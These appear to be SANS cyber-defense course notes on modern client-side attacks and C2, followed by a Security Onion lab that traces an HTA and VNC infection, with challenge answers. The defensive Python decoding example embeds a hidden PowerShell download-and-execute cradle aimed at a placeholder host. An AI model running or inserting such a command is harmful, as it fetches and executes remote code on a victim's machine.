Part Two
Last updated
Adversaries have learned to profit from cybercrime, using methods like credit card theft, identity theft, and stealing important trade secrets.
Modern attackers are often highly motivated and increasingly well-funded. While being well-funded doesn’t automatically make them skilled, there’s a link between money and capability, as wealthy attackers can hire skilled help. Nation-states are a prime example of well-funded adversaries, but many other groups, like organized crime and terrorist organizations, also have significant resources.
Well-funded attackers are as interested in money as poorly funded ones. Whatever the financial motive, skilled attackers focus on stealing valuable data and on keeping long-term access to the organizations they compromise.
Initial server-side exploitation is now rarely the way in. Attackers still use it, but it is no longer their primary method for breaking into well-defended organizations. Instead, they rely mainly on web application and client-side attacks. The web attacks can target popular software such as WordPress or Joomla, but custom web applications are especially attractive targets.
Adversaries often gain initial access to organizations through client-side exploitation, which requires some action from the victim. This can range from visiting a website to downloading and running a file, often involving social engineering.
Social engineering is getting someone to do something they shouldn't. The amount of persuasion needed varies, but in every case the attacker must convince the target to act. It is often jokingly called a Layer 8 attack, the human layer added on top of the 7-layer OSI model.
The above illustration demonstrates a phishing attack involving the use of a malicious attachment.
The attacker sends an email with a malicious PDF attachment.
The DMZ Mail Server relays the message to the Internal Mail Server.
The client checks for any new email.
The client downloads the email with the malicious attachment.
The client renders the malicious PDF, the attacker’s payload is delivered, and the client becomes compromised.
The (now compromised) client establishes an outbound C2 channel back to the attacker.
Client-side attacks are the primary initial-access vector today, and this is not seriously disputed. The shift happened because it works best: attackers are pragmatic and use the simplest method that succeeds. There is no need to complicate things when simple attacks are effective.
For years, server-side attacks effectively targeted important systems. But as attackers succeeded, we improved our defenses, like better patching, firewalls, and separating public and private networks. This forced attackers to change their methods to keep being successful.
Client-side exploitation uses various methods to attack, often relying on social engineering. Techniques can include email, social media, websites, mobile devices, or even physical access. The aim is to introduce harmful code into a system through weak applications or operating system features.
Wombat Security Technologies helps with the Verizon DBIR by sharing data from their security training and phishing awareness programs. Social engineering, especially spear phishing, is a major way attackers first compromise systems. The ThreatSim data shows that many users are still at risk: 7.3% of users were successfully phished by clicking a link or opening an attachment, and about 15% of those who were tricked once fell for it again.
This data poses a major risk to organizations and shows how attackers can keep succeeding. Later, we’ll see that traditional security systems struggle to defend against most spear phishing attacks.
Email is a common way for attackers to deliver threats. Users don't need to search for these threats; attackers send them directly. Email attacks usually use either attachments or links.
The most obvious email attack is sending malicious files as attachments. The method is old, but it has become less blatant. In the past, attackers simply sent executables and tried to get people to run them. That still happens, but most organizations now block executable attachments at the mail gateway.
More common now are maliciously crafted PDF, DOC(X), RTF, WMF, etc. files that exploit vulnerabilities in the default applications used to render those file types.
The author received a simulated phishing email from the SANS Securing the Human program, designed to trick the recipient into clicking a link. At SANS, we call these emails "getting Spitznered," after Lance Spitzner, who started the program.
The direct evil approach can work, but files must get through many security layers in a modern business. A less direct way is to use links, which are just a way to deliver web-based threats. This method faces less scrutiny from security tools and offers extra benefits. For example, it allows for more targeted attacks since the victim interacts with a web server. It also lets attackers send different attacks until one works.
Web-hosted attacks can be made more effective through better targeting. The image above shows three different browsers connecting to the SANS Internet Storm Center. Their User-Agent strings make the browsers easy to tell apart and also reveal the browser version, the operating system (for example, NT 6.3 means Windows 8.1 or Server 2012 R2), and whether the client is 64-bit. This lets an attacker serve an exploit tailored to the specific browser, raising the chance of success.
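As an added illustration (not code from the course), the following Python parses User-Agent strings the way an exploit-kit landing page, or a defender reviewing HTTP logs, would: it extracts the browser family and version, maps the Windows NT version to its marketing name, and checks for the 64-bit markers (WOW64, Win64; x64). The three User-Agent strings are constructed samples, not the ones in the ISC screenshot.

```python
"""Added example (not from the course): fingerprint a client from its HTTP
User-Agent string. Sample UAs are constructed for this example."""
import re

# NT kernel version -> marketing name, as carried in the User-Agent header.
NT_VERSIONS = {
    "6.1": "Windows 7 / Server 2008 R2",
    "6.2": "Windows 8 / Server 2012",
    "6.3": "Windows 8.1 / Server 2012 R2",
    "10.0": "Windows 10 / Server 2016+",
}

# Order matters: Edge also carries "Chrome/", Chrome also carries "Safari/",
# and Firefox carries an "rv:" token, so the more specific patterns come first.
BROWSER_PATTERNS = [
    ("Edge", re.compile(r"Edge/(\d+(?:\.\d+)?)")),
    ("Firefox", re.compile(r"Firefox/(\d+(?:\.\d+)?)")),
    ("Chrome", re.compile(r"Chrome/(\d+(?:\.\d+)?)")),
    ("Internet Explorer", re.compile(r"rv:(11\.\d+)\) like Gecko")),  # IE11 style
    ("Internet Explorer", re.compile(r"MSIE (\d+(?:\.\d+)?)")),       # IE10 and older
]


def fingerprint(ua):
    """Return what a server can infer from one User-Agent string."""
    info = {"browser": "unknown", "version": None, "os": "unknown", "x64": False}
    for name, pattern in BROWSER_PATTERNS:
        m = pattern.search(ua)
        if m:
            info["browser"], info["version"] = name, m.group(1)
            break
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt:
        info["os"] = NT_VERSIONS.get(nt.group(1), "Windows NT " + nt.group(1))
    # WOW64 = 32-bit browser on 64-bit Windows; "Win64; x64" = native 64-bit browser.
    # Either way the OS is 64-bit, which decides which exploit build to serve.
    info["x64"] = bool(re.search(r"WOW64|Win64; x64", ua))
    return info


SAMPLE_UAS = [  # constructed samples
    "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/67.0.3396.99 Safari/537.36",
]

if __name__ == "__main__":
    for ua in SAMPLE_UAS:
        print(fingerprint(ua))
```

Defensively, the same parser run over proxy or Zeek http.log User-Agent fields surfaces outdated browser builds that an exploit kit would single out, and User-Agents that no real browser produces.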
Malvertising is a type of online threat where bad ads are added to trusted websites. Victims often try to stay safe by only visiting known sites. However, attackers can place harmful ads on these sites. For example, from late 2013 to early 2014, Yahoo.com experienced a major malvertising attack that directed users to the Magnitude exploit kit.
A newer attack, called watering hole or strategic web compromise, targets users by infecting websites they visit. It's like a lion waiting at a watering hole for prey instead of hunting directly.
A cyber watering hole attack happens when attackers compromise a legitimate website that the target victim is likely to visit. For example, in Operation Snowman, the US Veterans of Foreign Wars' website was used to spread malware to its users.
Client-side and web application attacks have increased because public-facing systems are now better secured and patched. Attackers also use physical media to get around network defenses: in 2008/2009 the Conficker worm revived removable-media propagation, spreading via autorun on USB drives, a technique that dates back to floppy-era malware.
Mobile devices and apps can also be targeted by attackers. Although there are new attacks aimed at mobile, many threats are still similar to those seen before. The risks are largely the same, but they come in a smaller, more trusted form.
The term "minnow" isn't commonly used for phishing emails on mobile devices, but it should be. Minnows are small phishes. Phishing works the same on mobile, but there are some differences. Mobile email clients often show only the display name instead of the full email address due to limited screen space. They also display emails and links differently than traditional web-based email clients.
In the screenshot, I'm hovering over a link to see where it really goes. Many people don’t know how to do this on mobile devices. Usually, you have to press and hold the link. What if I don’t hold it long enough or my finger slips? The link we thought went to Facebook actually leads somewhere else.
Modern attackers use advanced techniques after gaining access. In the past, malware had limited effects, but now attackers can do much more after compromising a system. The upcoming content will show common post-exploitation activities in today's attacks.
Modern attackers are practical and see many uses for your computer or email. They mainly target data they can steal directly from the victim's system or data they can access through the victim.
Adversaries often target data, aiming to steal it from a network or data center. This is called data exfiltration. "Data leakage" is a similar term but can also mean accidental exposure, not just intentional theft.
Encryption on the internet has grown a lot recently, with HTTPS becoming common thanks to Let’s Encrypt (free certificates since 2016). Other encrypted protocols like QUIC, DNS over HTTPS, and DNS over TLS are also on the rise.
TLS 1.3, finalized in 2018, makes traffic much harder to intercept. With TLS 1.2 and RSA key exchange, a monitoring device holding the server's private key could decrypt traffic passively; TLS 1.3 requires ephemeral (Diffie-Hellman) key exchange, so passive decryption with the server's key is no longer possible and only active, inline proxying remains. Some organizations work around this by blocking QUIC (so clients fall back to TCP-based TLS that an inline proxy can terminate) or by forcing TLS 1.2 on internal servers, but these are stopgaps. As networks become harder to monitor for malware and data leakage, more of the monitoring has to move onto the host.
The first victim rarely has the data the attacker wants. Usually, the compromised device is just a starting point to reach bigger targets.
Even if the first victim doesn't have much power in the organization, they are still in a better position and less suspicious than the attacker. Being inside the organization gives greater abilities.
The graphic above explores an example of lateral movement or pivoting.
Unsuspecting user browses a malicious site.
The website delivers a browser-based exploit to the client.
Compromised client establishes a C2 channel to the attacker.
Attacker pivots to compromise key server from within.
Advanced post-exploitation usually requires interactive control of the compromised host. Some complex attacks have succeeded without it, but they are far more likely to fail.
Command and Control (C2), also written C&C or CNC, lets attackers interact with victims to control their actions, access data, and manage resources. Traditionally this was done with Remote Access Trojans (RATs) or backdoor bind shells that listen for inbound connections, which stateful firewalls and NAT now block. Modern C2 uses reverse connections: the victim's system initiates an outbound connection to the attacker, which outbound-permissive policies are far more likely to allow.
Adversaries usually need ongoing access to a system over a long time to reach their goals. While they can quickly compromise an endpoint, getting what they want may take days, weeks, months, or even years. To stay close to their goal, they need long-term access to one or more systems. This ongoing access is called persistence. Without it, they would have to keep breaking in again and again.
An adversary's goal may take weeks or months to achieve. If the victim notices them, the attacker can be stopped from reaching their goal, even if they have already compromised the system. Attackers try to stay hidden, especially in targeted campaigns where avoiding detection is very important.
An attacker’s goals of staying hidden and maintaining access are often opposite. Staying persistent makes it easier for the victim to detect them, while focusing on being hidden can make it hard to keep access.
Reverse shell access is a way for attackers to control systems, but Meterpreter from Metasploit is more advanced. Even if top attackers don’t use Meterpreter directly, its features show what powerful tools are available to well-funded and determined threats.
A quick list of some of the capabilities offered by the open source Meterpreter payload.
Privilege Escalation
Password/Hash Theft
Keystroke Logging
Packet Capture
Pass-the-Hash
Access Token Smuggling
Pivoting (Automatic)
File Download/Upload
TLS Encrypted
Persistence
VNC (lame, but effective)
Reverse HTTP(S) Connection
Much, much, more!
This section introduces modern cyber defense principles, contrasting them with traditional methods. These principles will form the foundation for techniques we'll cover and apply throughout the course.
A key practice is assuming that your network is already compromised, even if you don’t know it yet. This mindset helps organizations rethink their security approach, treating every asset as possibly compromised.
Modern cyber defense focuses on detecting threats, not just blocking them. Many organizations struggle with this, especially when it comes to spotting attacks inside their network after the initial breach.
To improve detection, organizations create threat hunting teams. These teams are separate from regular analysts and focus on actively searching for signs of compromise. Instead of waiting for alerts, the threat hunting team actively looks for the compromise.
Detection teams alone are not the answer, though. Modern cyber defense concentrates on detecting post-exploitation activity rather than only malware or exploits.
Post-exploitation is often more damaging but easier to detect. Focusing on stopping adversaries from persisting and pivoting offers strong defense benefits.
Modern post-exploitation typically shows up in command and control (C2) traffic. Traditional C2 channels are easy to block at the perimeter; C2 carried over outbound TCP/443 (HTTPS) is newer and much harder to control because it blends in with legitimate traffic.
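Because the payload on TCP/443 is usually encrypted, one check that still works at the network level is timing: scheduled callbacks are regular where human browsing is bursty. The following Python is an added example, not course material, that groups connection records by source and destination and flags pairs whose inter-connection intervals have a low coefficient of variation. The records are constructed to mimic the fields of a Zeek conn.log and are not real data; the thresholds are assumptions to tune per environment.

```python
"""Added example (not from the course): flag possible C2 beaconing from
connection records by looking for regular outbound timing to one
destination on TCP/443. Records are constructed (ts, src, dst, dst_port)
tuples shaped like Zeek conn.log fields."""
import statistics
from collections import defaultdict

# Constructed sample: one host calling back every ~60s (small jitter) to a
# single external IP on 443, mixed with the same user's irregular browsing.
SAMPLE_CONN = [
    (1688630400.0, "10.5.11.57", "203.0.113.10", 443),
    (1688630461.0, "10.5.11.57", "203.0.113.10", 443),
    (1688630519.0, "10.5.11.57", "203.0.113.10", 443),
    (1688630580.5, "10.5.11.57", "203.0.113.10", 443),
    (1688630641.0, "10.5.11.57", "203.0.113.10", 443),
    (1688630699.0, "10.5.11.57", "203.0.113.10", 443),
    (1688630405.0, "10.5.11.57", "198.51.100.7", 443),
    (1688630412.0, "10.5.11.57", "198.51.100.7", 443),
    (1688630590.0, "10.5.11.57", "198.51.100.7", 443),
    (1688631900.0, "10.5.11.57", "198.51.100.7", 443),
    (1688631903.0, "10.5.11.57", "198.51.100.7", 443),
    (1688632400.0, "10.5.11.57", "198.51.100.7", 443),
]


def find_beacons(records, port=443, min_conns=5, max_cv=0.15):
    """Return {(src, dst): (mean_interval_s, cv)} for pairs whose
    inter-connection intervals are regular enough to look like a beacon.

    cv = stdev / mean of the gaps between successive connections. Human
    traffic is bursty (high cv); a scheduled callback has a low cv even with
    a little jitter. min_conns and max_cv are assumed thresholds."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in records:
        if dport == port:
            by_pair[(src, dst)].append(ts)
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_conns:
            continue  # too few samples to say anything about regularity
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            beacons[pair] = (mean, cv)
    return beacons


if __name__ == "__main__":
    for (src, dst), (mean, cv) in find_beacons(SAMPLE_CONN).items():
        print(f"{src} -> {dst}:443 every {mean:.1f}s (cv={cv:.3f})")
```

Legitimate software updaters and telemetry agents also beacon, so treat a hit as a hunting lead to enrich with destination reputation, TLS SNI and host telemetry, not as a verdict; the same logic applies unchanged to DNS query timing when C2 hides in DNS.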
"Prevention is best; detection is necessary." This saying is common in SANS Cyber Defense classes, but we need to add something. Just finding out we’re under attack isn’t enough. Knowing we’re being attacked doesn't really help us. The goal of detection is to quickly take action against the attacker. We aim to go from quickly noticing an attack to actively responding, so we can prevent not just the attack itself, but its serious consequences.
Modern cyber defense focuses on understanding Layer 7 (application layer) activities because most attacks happen there. For example, HTTP can be used in all stages of an attack: exploiting the client, delivering the payload, command and control, and stealing data. Traditional Layer 3/4 security devices see this as regular outbound HTTP traffic, making it hard to spot malicious activities. To counter this, defensive tools must not only see Layer 7 traffic but also understand the specific protocols and services involved.
Many organizations don’t have a specific role to keep track of information security risks regularly. They usually check for risks only every few months, relying on security staff to highlight new threats, or they may be caught off guard.
This course won't focus much on formal risk management, but it's important to understand risk in cyber defense, including threats, vulnerabilities, likelihood, and impact. Instead of formal assessments, we'll use existing risk assessments like the CIS Controls.
The CIS Controls are a high-quality (and free!) information security best practice consensus guide.
The five tenets behind the controls are:
Offense informs defense: Learn from real attacks to build strong defenses, using only controls that can effectively prevent these attacks.
Prioritization: Invest first in controls that reduce the most risk and protect against the biggest threats. Focus on those that can be easily put in place in your environment. The CIS Implementation Groups mentioned below are a good starting point for finding useful sub-controls.
Measurements and Metrics: Create standard metrics so executives, IT staff, auditors, and security officials can easily measure how well security measures work, allowing for quick identification and implementation of necessary changes.
Continuous diagnostics and mitigation: Continuously check current security measures to see how well they work and decide what to do next.
Automation: Automate defenses to help organizations consistently and easily check how well they follow controls and related measures.
The best practices are easy and effective. The Australian Signals Directorate (ASD) lists over 35 ways to reduce cyber security incidents and says that more than 85% of known attacks could have been avoided if victims had followed the 'Top Four' strategies.
The Top Four were:
Application Control
Patch applications
Patch operating systems
Restrict administrative privileges
Four of the Essential Eight fall in ASD's Prevent Malware Delivery and Execution section, and all four are preventive. Two of them, application control and patching applications, were also in the Top Four; the other two are user application hardening and configuring Microsoft Office macro settings.
While earlier measures focused on stopping intrusions before they start, these new ones aim to lessen the damage from intrusions that do occur. The main strategies in the "Limit Extent of Incidents" section reduce risks by fixing problems that give attackers extra advantages after they get in.
The Essential Eight includes a key measure added by ASD to combat ransomware: daily backups. While this may seem obvious, ASD sees the risk as serious enough to emphasize it as essential. They recommend that some backups should be 'disconnected' to prevent ransomware from potentially encrypting them too.
In the detection and response section, none of the strategies is rated Essential; the highest rating is Excellent. The strategies include:
Continuous incident detection and response
Host-based intrusion detection/prevention system
Endpoint detection and response software
Hunt to discover incidents
Network-based intrusion detection/prevention system
Capture network traffic
First let's run the following command to verify that Security Onion's networking is configured properly:
Now, let's open firefox and log into Security Onion using the following credentials.
Username: student@sec511.local
Password: Security511
A user clicked on a suspicious link on July 6th, 2023. They called the help desk and said their PC was acting funny. The help desk escalated the ticket to the security team and mentioned that the user's PC IP address is 10.5.11.57.
Identify the following:
The name of the initial malware file that was downloaded and executed.
The name of the site and IP address that hosted the executable.
The software/protocol used for C2.
Let's start by going to the Security Onion Hunt menu and search for that IP:
The event we're investigating happened on July 6th. To focus our search, let's change the date from the last 24 months to the specific date of the incident.
Let's enter the following date:
Now, Let's scroll down to view the events with alerts. The Onion Query Language has a powerful "groupby" feature that makes this easier. We'll update the search string to:
Now all alerts linked to this IP address and date are now shown clearly and briefly:
The HTA alerts are probably the most important, but let's first focus on the DNS and HTTP alerts related to "*.pw" to get a clearer understanding of the incident.
Let's click on the "ET DNS Query to a *.pw domain - Likely Hostile" alert and choose "Only":
To view the packet for this alert, let's click the ">" next to the date to expand the event. Then, scroll down to check the Suricata rule that triggered the alert.
The rule, reassembled from the fields below:
alert dns $HOME_NET any -> any any (msg:"ET DNS Query to a *.pw domain - Likely Hostile"; dns.query; content:".pw"; nocase; endswith; content:!".u.pw"; endswith; nocase; classtype:bad-unknown; sid:2016778; rev:8; metadata:created_at 2013_04_19, updated_at 2020_11_19;)
alert dns: "alert" is the action the rule takes when its conditions are met; "dns" restricts the rule to DNS traffic.
$HOME_NET any -> any any: the rule triggers on traffic from any host in the internal network ($HOME_NET, any source port) towards any destination IP and port. The "->" gives the direction of flow, here from the internal network outward.
msg:"ET DNS Query to a *.pw domain - Likely Hostile": the message logged when the rule fires. It indicates a DNS query for a .pw domain, which is flagged as potentially hostile.
dns.query: tells Suricata that the content matches which follow are evaluated against the query name inside the DNS request, not against the whole packet.
content:".pw"; nocase; endswith: the query name must contain ".pw". nocase makes the match case-insensitive, and endswith requires ".pw" to be at the very end of the name, i.e. the .pw top-level domain.
content:!".u.pw"; endswith; nocase: an exception. The "!" negates the match, so the rule does not fire for names ending in ".u.pw". This match is again anchored to the end of the name and case-insensitive.
classtype:bad-unknown: classifies the event as malicious activity whose exact nature has not been further categorised.
sid:2016778; rev:8: the Signature ID uniquely identifies the rule (2016778); rev is its revision number (8), which is incremented each time the rule is updated or modified.
metadata:created_at 2013_04_19, updated_at 2020_11_19: additional information about the rule: it was created on April 19, 2013 and last updated on November 19, 2020.
The rule matches DNS queries for names ending in ".pw" and excludes names ending in ".u.pw". The .pw top-level domain gets this attention because its domains are cheap and have been heavily abused by malware operators. Not all .pw traffic is malicious, which is why the rule is only classified bad-unknown, but in this case the alert is justified.
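To make the rule's matching semantics concrete, here is an added example (not from the course or from Suricata) that reassembles the rule from the fields shown above, parses it into header fields and options, and evaluates the dns.query content matches against constructed query names. Only the keywords this rule uses (content, nocase, endswith, negation) are implemented; it is an evaluator for illustration, not a Suricata reimplementation.

```python
"""Added example (not from the course or Suricata): parse ET rule sid:2016778
and apply its dns.query content matches to constructed DNS query names."""
import re

RULE = ('alert dns $HOME_NET any -> any any ('
        'msg:"ET DNS Query to a *.pw domain - Likely Hostile"; dns.query; '
        'content:".pw"; nocase; endswith; '
        'content:!".u.pw"; endswith; nocase; '
        'classtype:bad-unknown; sid:2016778; rev:8; '
        'metadata:created_at 2013_04_19, updated_at 2020_11_19;)')

# One option runs up to an unquoted ';' (a quoted msg may itself contain ';').
OPTION_RE = re.compile(r'\s*((?:[^;"]|"[^"]*")+);')


def parse_rule(rule):
    """Split a rule into its header fields and an ordered list of options."""
    header, _, body = rule.partition("(")
    action, proto, src, sport, _, dst, dport = header.split()
    options = [m.group(1).strip() for m in OPTION_RE.finditer(body.rstrip(")"))]
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "dst": dst, "dport": dport, "options": options}


def build_matchers(options):
    """Turn content:/nocase/endswith options into matcher dicts. As in
    Suricata, a modifier applies to the most recent content keyword and a
    content match applies to the sticky buffer (dns.query) selected before it."""
    matchers, sticky_buffer = [], None
    for opt in options:
        key, _, val = opt.partition(":")
        if key == "dns.query":
            sticky_buffer = key
        elif key == "content":
            matchers.append({"buffer": sticky_buffer,
                             "pattern": val.lstrip("!").strip('"'),
                             "negated": val.startswith("!"),
                             "nocase": False, "endswith": False})
        elif key in ("nocase", "endswith"):
            matchers[-1][key] = True
    return matchers


def content_hit(matcher, data):
    """Does this content pattern occur in data, honouring nocase/endswith?"""
    pattern = matcher["pattern"]
    if matcher["nocase"]:
        data, pattern = data.lower(), pattern.lower()
    return data.endswith(pattern) if matcher["endswith"] else pattern in data


def rule_fires(query_name, rule=RULE):
    """True when every dns.query content matcher is satisfied. A negated
    content (content:!"...") is satisfied when the pattern is NOT found."""
    matchers = build_matchers(parse_rule(rule)["options"])
    return all(content_hit(m, query_name) != m["negated"]
               for m in matchers if m["buffer"] == "dns.query")


def rule_sid(rule=RULE):
    for opt in parse_rule(rule)["options"]:
        if opt.startswith("sid:"):
            return int(opt[4:])
    return None


if __name__ == "__main__":
    for q in ["www.plugh.pw", "EVIL.PW", "host.u.pw", "plugh.pw.example.com"]:
        print(f"{q:25} fires={rule_fires(q)}")
```

The exclusion shows why option order matters when reading ET rules: each nocase/endswith binds to the content immediately before it, and a negated content is a condition that must hold (the suffix must be absent), not a second thing to look for.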
Now, let's return to the previous view (destination.ip: 10.5.11.57 OR source.ip: 10.5.11.57 | groupby rule.name).
We'll use the same method from the previous step to check the "ET INFO HTTP Request to a *.pw domain" alert. This rule is like the previous DNS rule but is triggered by HTTP traffic instead.
Now let's inspect the HTA traffic. There are three HTA alerts, associated with two connections:
Connection 10.5.11.57:52054 -> 103.16.76.213:80 triggered two alerts: "ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl" and "ET POLICY Possible HTA Application Download".
Connection 10.5.11.57:52052 -> 103.16.76.213:80 triggered one alert: "ET POLICY Possible HTA Application Download".
Let's check this alert first: "ET POLICY Possible HTA Application Download"
The message shows that the file downloaded is video.hta from the domain plugh.pw.
Now, let's click on the "ET POLICY Possible HTA Application Download" rule for the connection 10.5.11.57:52054 -> 103.16.76.213:80. Then go to Actions -> PCAP. Make sure you select the connection with source port 52054.
The PCAP view shows a summary of the connection, which ended early with a "RST" (TCP reset).
Let's download the packet file and open it with Wireshark.
Wireshark shows that the connection ends with a RST. Let's click on any frame and select Follow -> TCP Stream. There is base64-encoded content, but it appears to be truncated.
We might wonder why the connection was aborted. This often happens with malware, as connections can fail for various reasons like poor code or network problems. However, many malware types are persistent and will keep trying until they connect. Sometimes, malware will even retry after a successful connection.
Let's check the other connection. Close Wireshark and go back in Firefox. We'll look for the "ET POLICY Possible HTA Application Download" linked to this connection: 10.5.11.57:52052 -> 103.16.76.213:80. Make sure to select the event with source port 52052. Then click the rule name and choose Actions -> PCAP.
Now, let's download the packet file and open it with Wireshark.
Let's right-click on any frame and select Follow -> TCP Stream. We now have the complete payload, including base64-encoded content.
Let's decode the base64 with CyberChef.
We now have decoded the base64, revealing additional PowerShell content.
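The same decoding step can be scripted for triage. The following Python is an added example (not from the course): it finds long base64 runs in a script body and decodes them, recognising the UTF-16LE encoding that PowerShell's -EncodedCommand expects as well as plain UTF-8, and discarding blobs that decode to non-text. The HTA text and the PowerShell command inside it are constructed for the example; example.invalid is a placeholder host, not an indicator from the lab.

```python
"""Added example (not from the course): extract and decode base64 blobs from
a captured script body. Sample HTA and embedded command are constructed."""
import base64
import binascii
import re
import string

# A run of 40+ base64 alphabet characters with optional '=' padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed second-stage command; example.invalid is a placeholder host.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"


def encode_for_powershell(script):
    """Base64 over the UTF-16LE bytes of the script, the form that
    powershell -EncodedCommand (-enc) expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed text loosely shaped like a malicious HTA body.
SAMPLE_HTA = (
    '<script language="VBScript">\n'
    'Set sh = CreateObject("Wscript.Shell")\n'
    'sh.Run "powershell -nop -w hidden -enc ' + encode_for_powershell(STAGE2) + '", 0\n'
    '</script>'
)


def decode_blob(blob):
    """Return (encoding, text) for one base64 blob, or (None, None) when it
    is not valid base64 or does not decode to printable text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None, None
    # ASCII text stored as UTF-16LE has a NUL at every odd byte offset.
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return "utf-16-le", raw.decode("utf-16-le")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None, None
    if text and all(c in string.printable for c in text):
        return "utf-8", text
    return None, None  # binary content (e.g. an embedded executable), not text


def extract_encoded(script_text):
    """Return [(encoding, decoded_text), ...] for every decodable blob."""
    results = []
    for blob in B64_RUN.findall(script_text):
        enc, text = decode_blob(blob)
        if enc:
            results.append((enc, text))
    return results


if __name__ == "__main__":
    for enc, text in extract_encoded(SAMPLE_HTA):
        print(f"[{enc}] {text}")
```

Real droppers often nest this (base64 inside base64, or compressed with Deflate/Gzip before encoding), so in practice the output is fed back through the same function until nothing further decodes.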
Let's look at the C2 (Command and Control) traffic. VNC (Virtual Network Computing) is a tool for accessing desktop interfaces over a network. VNC itself isn't harmful, but it is often used by malware for C2 purposes.
Let's return to the Security Onion tab and click the Hunt tab.
Let's now download the pcap file and open it with Wireshark.
Let's right-click on any frame and select Follow -> TCP Stream. Notice the message "This program cannot be run in DOS mode."
We'll cover the Windows executable format more in class later. For now, it's important to point out that this behavior is unusual for regular VNC traffic and is more typical of malware. The connection starts with transferring a VNC executable, which runs and then reuses the same socket for VNC traffic.
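An added example (not from the course) of automating what the TCP stream view showed: locate the PE image at the start of the stream, compute where it ends from its section table, and report the protocol bytes that follow on the same socket. The stream is constructed from a minimal hand-built PE skeleton and an RFB (VNC) version banner; no real sample is involved. A stream cut short, like the first HTA connection in the lab that ended in a RST, is reported as truncated rather than mis-carved.

```python
"""Added example (not from the course): carve a PE image out of a reassembled
TCP stream and return what follows it. The stream is constructed here."""
import struct


def build_minimal_pe(payload=b"\x90" * 16):
    """Construct the smallest PE skeleton the carver needs: DOS header with
    e_lfanew, the familiar DOS stub text, 'PE\\0\\0', a COFF header declaring
    one section, a PE32 optional header and one section header pointing at
    payload. Constructed sample only; it is not a runnable executable."""
    stub = b"This program cannot be run in DOS mode.\r\n$"
    e_lfanew = 64 + len(stub)
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)  # e_lfanew at 0x3C
    nt_sig = b"PE\x00\x00"
    opt_size = 224  # size of a PE32 optional header
    # Machine=i386, NumberOfSections=1, TimeDateStamp, PtrSymTab, NumSyms,
    # SizeOfOptionalHeader, Characteristics(executable, 32-bit)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)  # PE32 magic
    raw_ptr = e_lfanew + len(nt_sig) + len(coff) + opt_size + 40
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PtrRelocs, PtrLinenums, NumRelocs, NumLinenums, Characteristics
    section = b".text\x00\x00\x00" + struct.pack(
        "<IIIIIIHHI", len(payload), 0x1000, len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + stub + nt_sig + coff + opt + section + payload


def carve_pe(stream):
    """Find the first PE in stream (MZ -> e_lfanew -> 'PE\\0\\0') and compute
    its end as the furthest end of any section's raw data. Returns None when
    no PE is present, otherwise a dict with start, end, truncated, trailing.
    An overlay appended after the last section would not be included."""
    start = stream.find(b"MZ")
    while start != -1:
        if start + 64 <= len(stream):
            nt = start + struct.unpack_from("<I", stream, start + 60)[0]
            if stream[nt:nt + 4] == b"PE\x00\x00":
                break
        start = stream.find(b"MZ", start + 1)
    else:
        return None
    truncated = {"start": start, "end": None, "truncated": True, "trailing": b""}
    if nt + 24 > len(stream):
        return truncated
    nsections = struct.unpack_from("<H", stream, nt + 6)[0]
    opt_size = struct.unpack_from("<H", stream, nt + 20)[0]
    section_table = nt + 24 + opt_size
    end = start
    for i in range(nsections):
        hdr = section_table + 40 * i
        if hdr + 40 > len(stream):
            return truncated
        size_raw, ptr_raw = struct.unpack_from("<II", stream, hdr + 16)
        end = max(end, start + ptr_raw + size_raw)
    if end > len(stream):
        return truncated
    return {"start": start, "end": end, "truncated": False, "trailing": stream[end:]}


# Constructed stream: executable first, then the RFB (VNC) ProtocolVersion
# handshake on the same socket.
STREAM = build_minimal_pe() + b"RFB 003.008\n"

if __name__ == "__main__":
    r = carve_pe(STREAM)
    print(f"PE at {r['start']}..{r['end']}, followed by {r['trailing']!r}")
```

On a real capture, the carved bytes are what you hash and submit for analysis, and the trailing "RFB 003.008" banner is the confirmation that the socket was reused for VNC rather than closed.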
Challenge Answers:
The name of the initial malware file that was downloaded and executed: video.hta
The name of the site and IP address that hosted the executable: www.plugh.pw, 103.16.76.213
The software/protocol used for C2: VNC